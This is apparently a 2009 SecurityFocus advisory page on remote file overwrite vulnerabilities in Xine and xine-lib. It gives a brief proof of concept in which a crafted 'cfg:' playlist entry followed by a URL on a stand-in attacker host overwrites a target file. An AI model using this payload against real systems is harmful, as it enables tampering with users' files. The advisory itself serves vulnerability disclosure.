Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

Xine And Xine-Lib Multiple Remote File Overwrite Vulnerabilities

No exploit is required to leverage this issue. The following proof of concept has been provided:

The configuration syntax:

"cfg:/audio.sun_audio_device:targetFile"

If followed by the entry:

"http://www.example.com/attackerSpecifiedFile"

Will cause the attacker specified file to be written to the target file.







 

Privacy Statement
Copyright 2009, SecurityFocus